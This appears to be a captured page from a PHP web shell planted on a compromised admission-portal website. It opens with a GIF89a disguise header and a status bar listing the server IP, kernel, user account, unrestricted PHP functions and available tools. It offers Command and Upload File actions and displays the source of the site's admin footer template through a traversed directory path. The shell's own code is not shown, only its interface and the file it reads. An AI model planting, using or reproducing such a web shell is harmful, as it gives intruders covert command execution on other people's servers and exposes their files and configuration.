GIF89a;
Server IP : 172.26.0.195 / Your IP : 3.149.24.143 Web Server : Apache System : Linux 43-205-77-33.cprapid.com 3.10.0-1160.119.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Jul 15 12:09:18 UTC 2024 x86_64 User : jnclnmuac ( 1026) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/jnclnmuac/public_html/web/../admission/application/logs/../views/admin/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<script src="<?php echo base_url("assets/admin/js/jquery.nicescroll.js"); ?>"></script> <script src="<?php echo base_url("assets/admin/js/scripts.js"); ?>"></script> <script src="<?php echo base_url("assets/admin/js/modernizr.js"); ?>"></script> <script> // When the user scrolls down 20px from the top of the document, show the button window.onscroll = function () { scrollFunction(); }; function scrollFunction() { if (document.body.scrollTop > 20 || document.documentElement.scrollTop > 20) { document.getElementById("movetop").style.display = "block"; } else { document.getElementById("movetop").style.display = "none"; } } // When the user clicks on the button, scroll to the top of the document function topFunction() { document.body.scrollTop = 0; document.documentElement.scrollTop = 0; } </script> <!-- /move top --> <!-- close script --> <script> var closebtns = document.getElementsByClassName("close-grid"); var i; for (i = 0; i < closebtns.length; i++) { closebtns[i].addEventListener("click", function () { this.parentElement.style.display = 'none'; }); } </script> <!-- //close script --> <!-- disable body scroll when navbar is in active --> <script> $(function () { $('.sidebar-menu-collapsed').click(function () { $('body').toggleClass('noscroll'); }); }); </script> <!-- disable body scroll when navbar is in active --> <!-- loading-gif Js --> <script> $(document).ready(function () { // Animate loader off screen $(".se-pre-con").fadeOut("slow"); }); </script> <!--// loading-gif Js --> <!--footer section start--> <footer class="dashboard"> <p>© <?php echo date("Y"); ?> Admission Portal. All Rights Reserved | Design and developed by <a href="http://www.softproindia.in/" target="_blank">Softpro India Computer Technologies (P) Ltd.</a></p> </footer> <!--footer section end--> <!-- move top --> <button onclick="topFunction()" id="movetop" class="bg-primary" title="Go to top"> <span class="fa fa-angle-up"></span> </button>